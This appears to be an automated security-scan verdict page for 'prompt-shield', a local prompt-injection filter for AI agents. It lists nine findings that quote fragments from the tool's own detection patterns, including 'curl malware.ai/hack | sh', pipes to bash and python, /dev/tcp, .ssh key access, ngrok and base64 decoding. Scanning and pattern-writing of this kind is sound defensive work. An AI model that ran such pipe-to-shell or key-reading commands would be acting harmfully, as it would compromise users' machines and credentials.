ClawAudit verdict
prompt-shield
Local prompt injection firewall that runs pattern matching against input text using a local Python script; all 113 detection patterns operate locally with no network calls or data exfiltration.
⚠ Flagged for review — coarse, uncorroborated signal, not a confirmed exploit. Review the config yourself before installing.
Automated static analysis — not a human review. ClawAudit flags capabilities, not confirmed intent, and can produce false positives. Disagree with this verdict? Use Dispute below.
Findings (9)
Pipe to sh — executes piped content as shell commands
SCORING.md · code · | sh
Pipe-to-shell pattern (curl | sh) — supply chain attack vector
SCORING.md · code · curl malware.ai/hack | sh
Pipe to bash — executes piped content as shell commands
patterns.yaml · prose · downgraded · |bash
Bash /dev/tcp — raw TCP connection via shell
patterns.yaml · prose · downgraded · /dev/tcp/
Pipe to python — executes piped content as Python code
prompt-shield-hook.sh · prose · downgraded · | python3
References SSH/GPG private keys
patterns.yaml · prose · downgraded · ssh_key
Accesses .ssh directory
patterns.yaml · prose · downgraded · .ssh/
References tunneling service
patterns.yaml · prose · downgraded · ngrok
Base64 encoding/decoding
patterns.yaml · prose · downgraded · base64_decode
Why the tier is capped
Execution sink present in raw bytes (Hard Floor: class A). Final tier capped at Caution — cannot be lifted by any downgrade, example-payload opt-in, or allowlist.
Permissions & capabilities
No declared permissions — minimal attack surface.
Is this flag fair?
Thanks — recorded.